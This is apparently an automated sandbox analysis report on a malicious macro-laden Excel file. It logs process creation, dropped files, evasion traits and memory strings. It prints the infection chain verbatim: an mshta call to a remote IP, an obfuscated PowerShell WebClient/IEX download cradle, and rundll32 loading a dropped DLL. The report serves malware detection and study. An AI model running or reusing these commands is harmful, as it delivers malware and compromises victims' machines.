                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: opastonline.com.xlsOLE indicator, VBA macros: true
                            Source: opastonline.com.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@18/13@5/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: opastonline.com.xlsOLE indicator, Workbook stream: true
                            Source: opastonline.com.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K........T.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....................................}..v............0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k..... ..............................}..v.... .......0.................T.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k....................................}..v....X.......0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w.......................k......T.............................}..v............0...............H.T.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k....................................}..v............0...............................................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#..................k....................................}..v............0.................T.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............z..k....E...............................}..v............0.................T.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............z..k....E...............................}..v............0.................T.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0.................#.....:.......................
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",LdijUjelIhHUzGb
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Diftwn\pevlwp.arl",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE417.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00765988 CreateToolhelp32Snapshot,
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: >ystem.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000007.00000002.676804075.0000000002047000.00000004.00000020.00020000.00000000.sdmp
                            Source: 4885.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032200BF push 8B490264h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032208D0 push 8B490264h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032200BF push 8B490264h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032208D0 push 8B490264h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032200BF push 8B490264h; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_032208D0 push 8B490264h; iretd
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: JooSee.dll.7.drStatic PE information: real checksum: 0x8df98 should be: 0x921ce
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Diftwn\pevlwp.arl (copy)Jump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Diftwn\pevlwp.arl (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Diftwn\pevlwp.arl:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exe TID: 1232Thread sleep time: -360000s >= -30000s
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.2 %
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end node
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: rundll32.exe, 0000000D.00000002.676590864.00000000003C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Cookie: BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4=
                            Source: powershell.exe, 00000007.00000002.676501959.00000000003F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                            Source: rundll32.exe, 0000000D.00000002.676502532.000000000037A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ie: BwMZppe=k+xTN6MmPGeKtMCp9AXrdw4NHBgXIRV4ro2bUmaGDCMDXSxoBMQCwjSpwp5vyWJa/SIi0qz1YmI+MBHUUB8vdNgWC903z8XYt/+U3LubTa8EUGRipcggEilFzmzdKwyPX8iXDTkhu2TggptP0x7H3z1ypHwsIbX0FHyUJ7TCzVJ0kEDJN5n8utaI03ezj8VJBVtfGXfYxMU/qeH2NYK+NBrrnx0jLxe+CIgTACon5J58MNiO9DeQ5rXayMAH10gUjJL9LazlnjoNjuFYweaP8pmNb1zvMciD6RRtp8wSzWKlrbMfi70KtUr0oIisu2Q/UsGQ3lEVk7fDYj6lQ0/8ae4=
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,
